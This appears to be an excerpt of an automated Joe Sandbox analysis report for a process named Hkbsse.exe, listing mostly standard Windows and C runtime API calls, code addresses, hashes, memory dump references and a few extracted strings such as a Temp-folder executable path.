                    • Instruction Fuzzy Hash: 83C1F271A043089BDB20DFB0C945BEBBBF4AF05304F10456FE81693782EB79A984CB59
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 04497188
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044971D9
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044971E9
                    • __Mtx_unlock.LIBCPMT ref: 0449728C
                    • __Mtx_unlock.LIBCPMT ref: 04497392
                    • __Mtx_unlock.LIBCPMT ref: 044973CD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 5ffcf8c3e0cb8050eb0a3139b3e83871b2da912d4d9f8f61645cc253454790e3
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction Fuzzy Hash: 8AC19C71910204DBEF24DFA5C985BAFBFE4AF05218F04452FE81697782EB35B904EB61
                    APIs
                    • GetConsoleCP.KERNEL32(?,00408770,00000000), ref: 0043FDAA
                    • __fassign.LIBCMT ref: 0043FF89
                    • __fassign.LIBCMT ref: 0043FFA6
                    • WriteFile.KERNEL32(?,00408770,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FFEE
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0044002E
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004400DA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction ID: 5c7093ca26383f089595d5279c1be1ab1822dbd5e540b6b74e9a9434c58314bd
                    • Opcode Fuzzy Hash: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction Fuzzy Hash: 2ED1CD71D002589FDF15CFA8D880AEEBBB5BF49304F28416AE855FB342D635AD06CB58
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EA2F
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042EA37
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EA61
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042EA6A
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EAED
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042EAF5
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 1f3a1950eff8c09013561670095c22540fa8b87dd5baeeb1554441bdcab44dd9
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 4A418339B00619AFCF08DF65D454AADBBB5FF48310F40815AE406A7391CB74AD01CF85
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 044AEC96
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044AEC9E
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044AECC8
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044AECD1
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044AED54
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044AED5C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 4c5ed41417076db7be57926c2a61ea774c706281852a2af171e6b10d9403b292
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 96417F79A00619AFDF08DF64C494A6DBBB1FF48315F10816AE416AB791CB30BD11CF80
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0041EDFD
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EE27
                      • Part of subcall function 0041F4ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F50A
                    • __alloca_probe_16.LIBCMT ref: 0041EE63
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041EEA4
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EED6
                    • __freea.LIBCMT ref: 0041EEFC
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 1319684358-0
                    • Opcode ID: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction ID: 07282ca70093aa5fae6e1acffc276a069bf1d2a43c8646ebc404eb48b5e248eb
                    • Opcode Fuzzy Hash: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction Fuzzy Hash: 14319075A002058FDB14DFAAC9415EEB7F5AF08314F24406FE805E7351DB389E86CBA9
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A179
                      • Part of subcall function 0042B670: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B6BF
                    • GetCurrentThread.KERNEL32 ref: 0042A183
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A18F
                      • Part of subcall function 00420498: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 004204AA
                      • Part of subcall function 00420924: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042092B
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A1D2
                      • Part of subcall function 0042B622: SetEvent.KERNEL32(?,?,0042A1D7,0042AF6B,00000000,?,00000000,0042AF6B,00000004,0042B617,?,00000000,?,?,00000000), ref: 0042B666
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A1DB
                      • Part of subcall function 0042AC51: List.LIBCONCRT ref: 0042AC87
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A1EB
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 318399070-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: fe86043d0ec5758fdeb7fa1791ef53b29c71cd57ba806e603e01c4068b965251
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 8E21B031600B249FCB24EF66E9508BBF3F4FF48304740455EE942A7651CB78E905CBAA
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 044AA3E0
                      • Part of subcall function 044AB8D7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 044AB926
                    • GetCurrentThread.KERNEL32 ref: 044AA3EA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 044AA3F6
                      • Part of subcall function 044A06FF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 044A0711
                      • Part of subcall function 044A0B8B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 044A0B92
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 044AA439
                      • Part of subcall function 044AB889: SetEvent.KERNEL32(?,?,044AA43E,044AB1D2,00000000,?,00000000,044AB1D2,00000004,044AB87E,?,00000000,?,?,00000000), ref: 044AB8CD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 044AA442
                      • Part of subcall function 044AAEB8: __EH_prolog3.LIBCMT ref: 044AAEBF
                      • Part of subcall function 044AAEB8: List.LIBCONCRT ref: 044AAEEE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 044AA452
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: a74da15316cd2bb3fc8a855021cdb9ca4d5ecf75eb018558b03dc562fa097363
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 2D21AC31500B119FDF24EF66C9908ABB3F9FF5C208700491EE942A7651DB34B905CBA5
                    APIs
                    • GetLastError.KERNEL32(?,?,0043503F,00433C00,0041B665,13877BC0,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 00435056
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435064
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043507D
                    • SetLastError.KERNEL32(00000000,?,0043503F,00433C00,0041B665,13877BC0,?,00000000,0044B448,000000FF,?,004023EA,?,?), ref: 004350CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 8d24dae537e6274fcf49c1697837548d04e0bffea64ecaf3a521acfb1b817ace
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: 9A01453220EF226EA22826756C81A1B2665EB09738F30223FF224451E1FECB480092CD
                    APIs
                    • GetLastError.KERNEL32(?,?,044B52A6,044B3E67,0449B8CC,00462014,?,00000000,0044B448,000000FF,?,04482651,?,?), ref: 044B52BD
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 044B52CB
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 044B52E4
                    • SetLastError.KERNEL32(00000000,?,044B52A6,044B3E67,0449B8CC,00462014,?,00000000,0044B448,000000FF,?,04482651,?,?), ref: 044B5336
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction ID: 0d784a8bdfe52875473400a6bd0a2a7d98426f5af0f52f156d8ed7a491310b88
                    • Opcode Fuzzy Hash: b07de53ced0629e77d54eea71d233bc361282fd8b55c12240ca057c3c3e4afae
                    • Instruction Fuzzy Hash: E301F53260DB217EBF242B757C455E76745EB0167C720123FE394402E1FEE2680296E9
                    APIs
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD39
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD3F
                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD6C
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD76
                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0041FD88
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FD9E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                    • String ID:
                    • API String ID: 2808382621-0
                    • Opcode ID: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction ID: 4f3bf0f7770c7e5986951e0f5cc567661e6afe5f20b1112d50d855a3cbefbd6a
                    • Opcode Fuzzy Hash: c0a4f277fe568b30ff606a76a18e0e24afb7e465af144ec3c514b72e4719e68f
                    • Instruction Fuzzy Hash: B401FC3554021567DB10ABB2FC05BFF3768EF41712B10483BF402D1152DB2CE94A876D
                    APIs
                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00434F7E
                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00434F97
                    • PMDtoOffset.LIBCMT ref: 00434FBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FindInstanceTargetType$Offset
                    • String ID: Bad dynamic_cast!
                    • API String ID: 1467055271-2956939130
                    • Opcode ID: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction ID: c3d998d34e3c5e6d783fab50cb8decc3bcb55afa041ecdf7956987aee26e1d96
                    • Opcode Fuzzy Hash: 0521f5f12162b5f940dd835c7097114a2cc624e250e977d47238f7f30b439742
                    • Instruction Fuzzy Hash: CB212732A04205AFDF14DF64D906EEE77A4EBCC724F24521BF90493280DB39FD0186A9
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431993
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004319B2
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004319F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 1284976207-2046700901
                    • Opcode ID: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction ID: 1c2ff945bfb3779234e5a6cf3f9012e4fdc6cf8487c5ad4306e8c2bd46a22409
                    • Opcode Fuzzy Hash: 7696fed31027723f35f026be7f56ee9a288ab6992535e51fad3a21373ee75dd4
                    • Instruction Fuzzy Hash: 52212935700215ABCB18AB25D8A4B7E73A5BF98335F04116BE511873F2CF6CAC45CA99
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 0043E08B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction ID: f4dc822ff7adfef32422cf1d068892eb60ac2f919edbcc6374e1cafa7be57565
                    • Opcode Fuzzy Hash: d976a1582a0ea40e6d34111d7caa758c1d1378cc5cd5895febd347388f405018
                    • Instruction Fuzzy Hash: C121C5B1605215BFDB206F639C81E6777BDEF08368F20651AF52497381E779EC408BA8
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 044BE2F2
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction ID: f9576f3b05c2e6fb0549964e272d8bde7653e829757a3beb88b5eb4c0c2c0fb7
                    • Opcode Fuzzy Hash: c2b0de2763c86ad6614d27659a9b599b6b937d4051c2e6d32a144a313df7ce7a
                    • Instruction Fuzzy Hash: AD217171604705AFEF209E729C809EB7768EB80268720551AE9AD96691EB31FC419BF0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction ID: d16564c9a29a3a8969ec7240e5edfb42ca856ad351659fd50751cb54bcf8bce3
                    • Opcode Fuzzy Hash: 76ed5b3c9a0d73b5894b50308dce038bad0a816de482078dd29a63f31f2b0ceb
                    • Instruction Fuzzy Hash: 23010867608616312635A0199C02B7B57988F9ABB4F25102FFC94F76C3DE8CDC0291EC
                    APIs
                    • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00425011
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00425034
                    • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00425076
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 18808576-3650809737
                    • Opcode ID: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction ID: 305bc4034c2cb983e96c2d8fe25bce993a68233bb1d7dc822cb2e33d84effcaf
                    • Opcode Fuzzy Hash: ee74751cda2579e54f441aeaee73b0045bcbbb17f9a78e7efd1f60961086b841
                    • Instruction Fuzzy Hash: 6821E035B00225EFCB04EF69D881AAD73A1FF48304F50402FE90597691DF75AE01CB89
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A716
                    • _free.LIBCMT ref: 0043A773
                    • _free.LIBCMT ref: 0043A7A9
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 0043A7B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction ID: be7c44a1fb34d1c37a26770ceb7c848a23a0808e2611b486d4a83bfcf4870b79
                    • Opcode Fuzzy Hash: 826befe5908a36a329c0b68ecd7869063ec108b53a76503526fd19857e2e3b2b
                    • Instruction Fuzzy Hash: 9A110D312847003AD61127755CC6E2B2169D7D9379F25213FF360862D1EFADCC16425F
                    APIs
                    • GetLastError.KERNEL32(?,?,?,00437628,00402207), ref: 0043A86D
                    • _free.LIBCMT ref: 0043A8CA
                    • _free.LIBCMT ref: 0043A900
                    • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00437628,00402207), ref: 0043A90B
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free
                    • String ID: x!F
                    • API String ID: 2283115069-3062043068
                    • Opcode ID: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction ID: b986b1826898f37416bf5ced70f3374c8b36f31c2da29752778e1ed8a3b37dc0
                    • Opcode Fuzzy Hash: c8ad822cd170ee70e40dfd3b9bf10ba13b5f2f5e684597da726ebd4380a789db
                    • Instruction Fuzzy Hash: 5A112C312847003AC61573755C42F2B2259EBC93B9F24213FF264962D1EA6D8C17411F
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-
                    • API String ID: 0-2084034818
                    • Opcode ID: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction ID: 24afc57fe78e1c6608cbdf562ed4d7e6d93aa0af096ef472e59e5906e3cd28f5
                    • Opcode Fuzzy Hash: 0f756fd091728f1714fffd2efd6505197b9063550eda6cdbc8ad120b831c3f96
                    • Instruction Fuzzy Hash: 7E110F31A01326BBCF324B68DC44A1F77659F09771F225123ED16A7392D674ED00C6E8
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 004321C5
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004321D6
                    • StructuredWorkStealingQueue.LIBCMT ref: 0043220C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043221D
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 9b603a7df0a9b275827e5962de0d870e8733e561ac416f5c4f25b928dcbe72b5
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: D911E7311001019BDF55DE69DF41A6B73A49F0A364F1890ABEC069F202CAB9D901CB99
                    APIs
                    • StructuredWorkStealingQueue.LIBCMT ref: 044B242C
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B243D
                    • StructuredWorkStealingQueue.LIBCMT ref: 044B2473
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B2484
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
                    • String ID: e
                    • API String ID: 3804418703-4024072794
                    • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction ID: 545fb13d29a4e1905a2066eddfe4540c4f7135683e440d8472697d57eb1e8286
                    • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                    • Instruction Fuzzy Hash: 9111C8312002009BEF54DE2DC8496EB73A4BF11254B14C5EBAC869F612DBB0F9018BF1
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436672,?,?,0043663A,?,?,?), ref: 00436692
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004366A5
